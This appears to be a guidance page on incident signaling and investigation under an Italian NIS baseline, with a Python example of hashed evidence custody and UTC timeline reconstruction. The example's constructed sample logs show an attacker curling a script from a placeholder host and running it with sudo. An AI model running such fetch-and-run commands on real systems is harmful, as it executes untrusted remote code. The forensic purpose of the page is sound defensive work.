Within the NIS baseline framework, the Response domain (RS) requires entities to execute incident response through structured sub-phases, including signaling and investigation. Operationally, this means teams must classify events, escalate appropriately, preserve evidence, and maintain a consistent flow toward decision and notification points.
Sources: ACN incident management guidance, ACN baseline obligations determination
Key takeaways
- Response should be run through documented phases, not ad hoc actions.
- Signaling and investigation are iterative and may loop as new evidence emerges.
- Roles and contacts for escalation and external interfaces must be pre-assigned.
- Investigation quality depends on evidence integrity, event correlation, and timeline reconstruction.
Sources: ACN incident management guidance
Signaling and investigation sequence
1. Event signaling and escalation
Teams should signal relevant events rapidly through predefined channels, with clear thresholds for escalation and decision ownership.
2. Initial response coordination (RS.MA)
The incident-response plan should activate procedures, responsibilities, and communication flows for management, technical teams, and external stakeholders.
3. Investigation workflow
Investigation should collect forensic evidence in a way that preserves its integrity (artifacts hashed at acquisition, every hand-over recorded), correlate logs and artifacts across sources after normalizing their timestamps, and build an evolving timeline of attacker actions and service impact.
4. Iterative decision loop
As investigation findings evolve, teams may return to signaling/escalation steps, refine incident qualification, and update response priorities.
5. Preparation for notification and containment handoff
Signaling and investigation outputs should be structured so they can support notification obligations and downstream containment/eradication actions.
Sources: ACN incident management guidance, ACN baseline obligations determination
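The evidence-integrity and timeline-reconstruction steps above are the ones most often done badly in practice: artifacts are copied without a hash, and logs from hosts in different time zones are ordered by their printed timestamps. The following Python is an added illustration written for this page, not ACN material or any tool the guidance names. It keeps an evidence register with SHA-256 hashes and a chain-of-custody list, and it normalizes syslog, Windows-event and EDR lines to UTC before ordering them. All host names, addresses, timestamps and log lines are constructed; the incident year and the CET zone of the on-premise hosts are assumptions the case file would normally supply.

```python
"""Evidence register with chain of custody, plus timeline reconstruction from
logs that use different formats and time zones. Added illustration for this
page; every host, IP, timestamp and log line below is constructed."""
from __future__ import annotations

import hashlib
import re
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone

INCIDENT_YEAR = 2024  # assumed: syslog lines carry no year, the case file supplies it
CET = timezone(timedelta(hours=1))  # assumed local zone of the syslog and Windows hosts


@dataclass
class EvidenceItem:
    item_id: str
    description: str
    sha256: str
    # chain of custody: (UTC timestamp, handler, action)
    custody: list[tuple[str, str, str]] = field(default_factory=list)


class EvidenceRegister:
    """Hashes each artifact at acquisition and records every hand-over."""

    def __init__(self) -> None:
        self.items: dict[str, EvidenceItem] = {}

    def acquire(self, description: str, data: bytes, handler: str, when_utc: str) -> EvidenceItem:
        item_id = f"EV-{len(self.items) + 1:03d}"
        item = EvidenceItem(item_id, description, hashlib.sha256(data).hexdigest())
        item.custody.append((when_utc, handler, "acquired"))
        self.items[item_id] = item
        return item

    def transfer(self, item_id: str, to_handler: str, when_utc: str) -> None:
        self.items[item_id].custody.append((when_utc, to_handler, "received"))

    def verify(self, item_id: str, data: bytes) -> bool:
        """True only if the artifact still matches the hash taken at acquisition."""
        return hashlib.sha256(data).hexdigest() == self.items[item_id].sha256


@dataclass(frozen=True)
class TimelineEvent:
    utc: datetime
    source: str
    host: str
    message: str


# source name -> (line regex, strptime format, zone the source stamps its lines in)
SOURCE_FORMATS = {
    "syslog": (re.compile(r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) (?P<msg>.*)$"),
               "%b %d %H:%M:%S", CET),
    "edr": (re.compile(r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\dZ) (?P<host>\S+) (?P<msg>.*)$"),
            "%Y-%m-%dT%H:%M:%SZ", timezone.utc),
    "winevt": (re.compile(r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (?P<host>\S+) (?P<msg>.*)$"),
               "%Y-%m-%d %H:%M:%S", CET),
}


def parse_event(source: str, line: str) -> TimelineEvent:
    regex, fmt, tz = SOURCE_FORMATS[source]
    m = regex.match(line)
    if m is None:
        raise ValueError(f"{source}: unparsable line {line!r}")
    local = datetime.strptime(m["ts"], fmt)
    if local.year == 1900:  # strptime default when the format has no year (syslog)
        local = local.replace(year=INCIDENT_YEAR)
    return TimelineEvent(local.replace(tzinfo=tz).astimezone(timezone.utc),
                         source, m["host"], m["msg"])


def build_timeline(lines_by_source: dict[str, list[str]]) -> list[TimelineEvent]:
    """Normalize every line to UTC, then order; ordering by printed local time would mislead."""
    events = [parse_event(src, ln) for src, lines in lines_by_source.items() for ln in lines]
    return sorted(events, key=lambda e: e.utc)


# Constructed sample logs: CET-stamped hosts next to a UTC-stamped EDR feed.
SAMPLE_LOGS = {
    "winevt": ["2024-03-12 09:10:20 dc01 4768 TGT requested for svc_backup from 10.0.5.21"],
    "syslog": ["Mar 12 09:14:03 web01 sshd[2211]: Accepted password for svc_backup from 203.0.113.7 port 51822",
               "Mar 12 09:16:02 web01 sudo: svc_backup : TTY=pts/0 ; COMMAND=/bin/bash /tmp/a.sh"],
    "edr": ["2024-03-12T08:15:47Z web01 process_create parent=bash image=/usr/bin/curl args=http://198.51.100.9/a.sh"],
}


def investigate() -> tuple[EvidenceRegister, list[TimelineEvent]]:
    reg = EvidenceRegister()
    raw_syslog = "\n".join(SAMPLE_LOGS["syslog"]).encode()
    ev = reg.acquire("web01 /var/log/auth.log excerpt", raw_syslog, "analyst.a", "2024-03-12T10:02:00Z")
    reg.transfer(ev.item_id, "forensics.b", "2024-03-12T11:30:00Z")
    return reg, build_timeline(SAMPLE_LOGS)


if __name__ == "__main__":
    register, timeline = investigate()
    for e in timeline:
        print(f"{e.utc.isoformat()} {e.source:7} {e.host:6} {e.message}")
    for item in register.items.values():
        print(item.item_id, item.sha256[:16], item.custody)
```

Two things to notice when it runs: the EDR line printed as 08:15 lands between the two 09:1x syslog lines once everything is in UTC, which is the order an investigator needs to argue that the download preceded the sudo execution; and a single appended byte to the captured log makes `verify` fail, which is what the chain-of-custody record is meant to catch before the artifact is used to support a notification.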
Minimum evidence set for RS signaling/investigation
| RS area | Practical objective | Typical evidence |
|---|---|---|
| Signaling governance | Fast and repeatable event escalation | Signaling SOP, escalation matrix, contact list |
| Response activation | Coordinated incident-response execution | Incident playbook, activation records |
| Investigation integrity | Reliable technical and forensic analysis | Evidence log, chain-of-custody records, analysis notes |
| Timeline reconstruction | Coherent sequence of incident evolution | Event timeline, correlated log artifacts |
| Decision traceability | Documented response decisions and updates | Decision register, incident status reports |
Sources: ACN incident management guidance
90-day execution checklist
- Validate signaling thresholds and escalation ownership across cyber, operations, and legal teams.
- Test response-plan activation in a scenario with partial information and evolving evidence.
- Standardize investigation templates for evidence capture, correlation, and timeline building.
- Define criteria for when new findings send the team back to signaling/escalation or into deeper investigation before further response actions are taken.
- Ensure incident records can support both governance review and external reporting when required.
FAQ
Are signaling and investigation linear steps?
No. Guidance indicates response sub-phases can be iterative as new evidence changes incident understanding. Source: ACN incident management guidance
What is the minimum requirement for investigation evidence?
At minimum, organizations should preserve and document relevant evidence, correlation logic, and timeline updates supporting response decisions. Source: ACN incident management guidance
How does this phase connect to notification?
Signaling and investigation provide the factual basis used to determine whether notification obligations apply and what information is reported. Sources: ACN incident management guidance, ACN baseline obligations determination